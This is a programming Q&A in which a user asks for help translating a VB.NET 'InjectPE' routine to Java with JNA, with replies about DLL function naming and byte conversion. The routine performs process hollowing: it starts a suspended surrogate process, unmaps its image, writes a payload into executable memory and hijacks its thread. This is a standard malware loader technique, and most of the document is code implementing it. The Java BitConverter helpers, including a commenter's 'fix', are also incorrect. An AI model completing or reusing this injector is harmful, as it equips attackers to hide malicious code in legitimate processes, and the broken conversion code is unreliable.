# Translating VB code to Java with JNA, getting close

Tags: java, vb.net, jna

I am trying to convert this VB code to Java:

```
Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean
    Try
        Dim procAttr As IntPtr = IntPtr.Zero
        Dim processInfo As IntPtr() = New IntPtr(3) {}
        Dim startupInfo As Byte() = New Byte(67) {}

        Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
        Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
        Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))

        If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
            procAttr, Nothing, startupInfo, processInfo) Then
            Dim ctxt As UInteger() = New UInteger(178) {}
            ctxt(0) = &H10002
            If GetThreadContext(processInfo(1), ctxt) Then
                Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                Dim buffer__1 As IntPtr = IntPtr.Zero
                Dim bufferSize As New IntPtr(4)

                Dim numRead As IntPtr = IntPtr.Zero

                If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
                    Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
                    Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
                    Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)

                    Dim lpNumberOfBytesWritten As Integer

                    WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                    Dim num5 As Integer = num - 1
                    For i As Integer = 0 To num5
                        Dim dst As Integer() = New Integer(9) {}
                        Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
                        Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                        Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)

                        size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                        addr = New IntPtr(buffer2.Length)

                        WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                    Next
                    size = New IntPtr(ctxt(&H29) + 8L)
                    addr = New IntPtr(4)

                    WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                    ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
                    SetThreadContext(processInfo(1), ctxt)
                End If
            End If
            ResumeThread(processInfo(1))
        End If
    Catch
        Return False
    End Try
    Return True
End Function
```

I have written the native call interfaces first.

**Kernel32**

```
import com.sun.jna.ptr.IntByReference;
import com.sun.jna.win32.StdCallLibrary;

public interface Kernel32 extends StdCallLibrary {

    boolean CreateProcess(String appName, String commandLine,
            IntByReference procAttr, IntByReference thrAttr, boolean inherit,
            int creation, IntByReference env, String curDir, byte[] sInfo,
            IntByReference[] pInfo);

    boolean GetThreadContext(IntByReference hThr, int[] ctxt);

    boolean ReadProcessMemory(IntByReference hProc, IntByReference baseAddr,
            IntByReference bufr, int bufrSize, IntByReference numRead);

    int ResumeThread(IntByReference hThread);

    boolean SetThreadContext(IntByReference hThr, int[] ctxt);

    IntByReference VirtualAllocEx(IntByReference hProc, IntByReference addr,
            IntByReference size, int allocType, int prot);

    boolean VirtualProtectEx(IntByReference hProcess, IntByReference lpAddress,
            IntByReference dwSize, int flNewProtect, int lpflOoldProtect);

    boolean WriteProcessMemory(IntByReference hProcess,
            IntByReference lpBaseAddress, byte[] lpBuffer, int nSize,
            int lpNumberOfBytesWritten);

}
```

**NtDll**

```
import com.sun.jna.ptr.IntByReference;
import com.sun.jna.win32.StdCallLibrary;

public interface NtDll extends StdCallLibrary {

    int NtUnmapViewOfSection(IntByReference hProc, IntByReference baseAddr);

}
```

After I had written the call interfaces I went on translating the function. I saw that I needed a *BitConverter* equivalent, so I wrote one.

```
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

public final class BitConverter {

    public static byte[] getBytes(int value) {
        ByteBuffer buffer = ByteBuffer.allocate(4).order(
                ByteOrder.nativeOrder());
        buffer.putInt(value);
        return buffer.array();
    }

    public static short toInt16(byte[] bytes, int index) {
        if (bytes.length != 8)
            return -1;
        return (short) ((0xff & bytes[index]) << 8 | (0xff & bytes[index + 1]) << 0);
    }

    public static int toInt32(byte[] bytes, int index) {
        if (bytes.length != 4)
            return -1;
        return (int) ((int) (0xff & bytes[index]) << 56
                | (int) (0xff & bytes[index + 1]) << 48
                | (int) (0xff & bytes[index + 2]) << 40 | (int) (0xff & bytes[index + 3]) << 32);
    }

}
```

Now I was ready to write the function. I came up with this:

```
public static boolean injectPE(Kernel32 kernel, NtDll ntdll, String process,
        byte[] bytes) {
    IntByReference procAttr = new IntByReference(0);
    IntByReference[] processInfo = new IntByReference[3];
    byte[] startupInfo = new byte[67];

    int num2 = BitConverter.toInt32(bytes, 60);
    int num = BitConverter.toInt16(bytes, num2 + 6);
    IntByReference ptr4 = new IntByReference(BitConverter.toInt32(bytes,
            num2 + 0x54));

    if (kernel.CreateProcess(null, process, procAttr, procAttr, false, 4,
            procAttr, null, startupInfo, processInfo)) {
        int[] ctxt = new int[178];
        ctxt[0] = 0x10002;

        if (kernel.GetThreadContext(processInfo[1], ctxt)) {
            IntByReference baseAddr = new IntByReference(ctxt[0x29] + 8);

            IntByReference buffer__1 = new IntByReference(0);
            IntByReference bufferSize = new IntByReference(4);

            IntByReference numRead = new IntByReference(0);

            if (kernel.ReadProcessMemory(processInfo[0], baseAddr,
                    buffer__1, bufferSize.getValue(), numRead)
                    && ntdll.NtUnmapViewOfSection(processInfo[0], buffer__1) == 0) {
                IntByReference addr = new IntByReference(
                        BitConverter.toInt32(bytes, num2 + 0x34));
                IntByReference size = new IntByReference(
                        BitConverter.toInt32(bytes, num2 + 80));
                IntByReference lpBaseAddress = kernel.VirtualAllocEx(
                        processInfo[0], addr, size, 0x3000, 0x40);

                int lpNumberOfBytesWritten = 0;

                kernel.WriteProcessMemory(processInfo[0], lpBaseAddress,
                        bytes, ptr4.getValue(), lpNumberOfBytesWritten);
                int num5 = num - 1;
                for (int i = 0; i <= num5; i++) {
                    int[] dst = new int[9];
                    System.arraycopy(bytes, (num2 + 0xF8) + (i * 40), dst,
                            0, 40);
                    byte[] buffer2 = new byte[dst[4] - 1];
                    System.arraycopy(bytes, dst[5], buffer2, 0,
                            buffer2.length);

                    size = new IntByReference(lpBaseAddress.getValue()
                            + dst[3]);
                    addr = new IntByReference(buffer2.length);

                    kernel.WriteProcessMemory(processInfo[0], size,
                            buffer2, addr.getValue(),
                            lpNumberOfBytesWritten);
                }

                size = new IntByReference(ctxt[0x29] + 8);
                addr = new IntByReference(4);

                kernel.WriteProcessMemory(processInfo[0], size,
                        BitConverter.getBytes(lpBaseAddress.getValue()),
                        addr.getValue(), lpNumberOfBytesWritten);
                ctxt[0x2C] = lpBaseAddress.getValue()
                        + BitConverter.toInt32(bytes, num2 + 40);
                kernel.SetThreadContext(processInfo[1], ctxt);
            }
        }

        kernel.ResumeThread(processInfo[1]);

        return true;
    }

    return false;
}
```

The issue I am having is that when I run to test I get this error:

```
Exception in thread "main" java.lang.UnsatisfiedLinkError: Error looking up function 'CreateProcess': The specified procedure could not be found.
```

I do not know how to diagnose JNA errors, so I'm stuck at this point. Any help with this and help on other things is GREATLY appreciated. Thanks!

Comment: `return (int) ((int) (0xff & bytes[index]) << 56` etc <--- this will always be 0

Comment: public static short toInt16(byte[] bytes, int index) {
  if (bytes.length != 8)
   return -1;
  return (short) ((0xff & bytes[index]) << 8 | (0xff & bytes[index + 1]));
 }

 public static int toInt32(byte[] bytes, int index) {
  if (bytes.length != 4)
   return -1;
  return (int) ((int) (0xff & bytes[index]) << 24
    | (int) (0xff & bytes[index + 1]) << 16
    | (int) (0xff & bytes[index + 2]) << 8 | (int) (0xff & bytes[index + 3]) << 32);
 }

Comment: Fixed it, I just C&Pd the BitConverter code.

Comment: `IntByReference` is never a valid return value.  Use `Pointer` or an appropriate `PointerType` instead.

Answer (score 1, accepted):

You can save yourself a bit of work by extending [JNA's Kernel32 mapping](https://github.com/twall/jna/blob/master/contrib/platform/src/com/sun/jna/platform/win32/Kernel32.java) provided in JNA's platform.jar instead of rolling your own.

If you use [dependency walker](http://dependencywalker.com) to look at kernel32.dll, you'll see that [`CreateProcess`](http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx) does not exist within the DLL, but `CreateProcessA` and `CreateProcessW` do exist.  Most w32 API functions come in "ansii" and "unicode" flavors, and differ in their definition of strings (`LPCTSTR`); the former uses `char*` and the latter uses `wchar_t*`.  Note that you should only map Java `String` where you see `LPCTSTR` (constant string); if the type is `LPTSTR` you must use a `byte[]` or `char[]` as appropriate.

If you look at the initialization of JNA's Kernel32 mapping, you'll see that it uses [`W32API_UNICODE_OPTIONS`](https://github.com/twall/jna/blob/master/src/com/sun/jna/win32/W32APIOptions.java), which automatically handles the translation from `CreateProcess` to `CreateProcessW` (as well as letting you use Java `String` for native strings instead of having to explicitly use JNA's `WString`).

Comment: By changing the method name from _CreateProcess_ to _CreateProcessW_ I believe JNA was able to successfully map without me having to change the _String_ arguments to _char[]_, although, it is returning _false_.

Comment: Method name mapping has nothing to do with how JNA maps types.  However, if you choose one native method over another, it has *everything* to do with the types you need to use with the mapping.